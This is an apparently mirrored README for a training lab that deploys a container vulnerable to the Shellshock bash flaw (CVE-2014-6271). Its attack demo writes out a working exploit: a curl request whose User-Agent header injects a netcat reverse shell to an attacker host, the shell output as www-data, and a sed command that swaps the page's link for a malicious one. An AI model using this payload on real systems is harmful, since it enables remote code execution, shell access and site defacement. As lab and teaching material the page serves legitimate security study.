关联漏洞
标题:
GNU Bash 远程代码执行漏洞
(CVE-2014-6271)
描述:GNU Bash是美国软件开发者布莱恩-福克斯(Brian J. Fox)为GNU计划而编写的一个Shell(命令语言解释器),它运行于类Unix操作系统中(Linux系统的默认Shell),并能够从标准输入设备或文件中读取、执行命令,同时也结合了一部分ksh和csh的特点。 GNU Bash 4.3及之前版本中存在安全漏洞,该漏洞源于程序没有正确处理环境变量值内的函数定义。远程攻击者可借助特制的环境变量利用该漏洞执行任意代码。以下产品和模块可能会被利用:OpenSSH sshd中的ForceComman
描述
This Repo is PoC environment of CVE-2014-6271(https://nvd.nist.gov/vuln/detail/cve-2014-6271).
介绍
# CVE-2014-6271-Apache-Debian
## Overview
This Repo is PoC environment of [CVE-2014-6271](https://nvd.nist.gov/vuln/detail/cve-2014-6271).
You can deploy web service including vulernability using apache2 container image.
## Preparation
### Image Build
Build insecure image from Dockerfile.
~~~
# docker build -t cve-2014-6271-apache-debian:buster ./insecure-base-image/
# docker build -t training-website-poc:v1.0 ./web-insecure/
~~~
### Deploy PoC Container
**Docker**
Deploy PoC container as a docker container.
~~~
# docker run -d -p 8080:80 training-website-poc:v1.0
~~~
**Kubernetes**
Deploy PoC container as a k8s pod and service.
~~~
# kubectl apply -f web-insecure/k8s-manifest/web-insecure-pod.yml
# kubectl apply -f web-insecure/k8s-manifest/web-insecure-svc.yml
~~~
### Access PoC Web Service
After the deployment is completed, you can browse the web page by accessing the following URL with a browser.
You can access the k8s lab environment by clicking the link "Click!" under the web page.
**Docker**
~~~
http://<docker host IP>:8080
~~~
**Kubernetes**
~~~
http://<k8s service endpoint>:<k8s service port>
~~~
### Attack Demo
In this demo, you can change the web page from Attacker Host (outside of container) exploiting vulernability of `CVE-2014-6271`.
Exec these commands from attacker host.
Terminal 1
~~~
# nc -nvlp 5050
~~~
Terminal 2
※In this case, we deploy PoC container using Docker. In case of Kubernetes, the URL should be `http://<k8s service endpoint>:<k8s service port>`.
~~~
# curl -H "user-agent: () { :; }; echo; /bin/nc -e /bin/bash <Attacker Host IP> 5050" http://<docker host IP>:8080/cgi-bin/vulnerable
~~~
After that, you can see that the `/bin/bash` of the PoC container can be executed in the terminal 1.
~~~
Listening on 0.0.0.0 5050
Connection received on 172.17.0.2 38926
id
uid=33(www-data) gid=33(www-data) groups=33(www-data),1000(wheel)
pwd
/usr/lib/cgi-bin
~~~
Change the link "Click!" of web page.
In this case, we use dummy page for malicious link.
~~~
sudo sed -i -e 's/https\:\/\/www.katacoda.com\/courses\/kubernetes/danger.html/' /var/www/html/index.html
~~~
Access the web page again and clicking the link "Click!" under the web page.
~~~
http://<docker host IP>:8080
~~~
## Reference
https://github.com/hmlio/vaas-cve-2014-6271
https://github.com/opsxcq/exploit-CVE-2014-6271
文件快照
[4.0K] /data/pocs/1677cdb0d4dad9ee3ade7b97982ea8813857dc63
├── [4.0K] insecure-base-image
│ ├── [ 373] danger.html
│ ├── [ 850] Dockerfile
│ ├── [4.0K] packages
│ │ └── [1.4M] bash_4.2%2Bdfsg-0.1_amd64.deb
│ └── [ 61] vulnerable
├── [2.3K] README.md
├── [4.0K] web-insecure
│ ├── [ 208] Dockerfile
│ ├── [1.0K] index.html
│ └── [4.0K] k8s-manifest
│ ├── [ 215] web-insecure-pod.yml
│ └── [ 179] web-insecure-svc.yml
└── [4.0K] web-secure
├── [ 196] Dockerfile
├── [1.0K] index.html
└── [4.0K] k8s-manifest
├── [ 713] web-secure-pod.yml
└── [ 175] web-secure-svc.yml
6 directories, 13 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。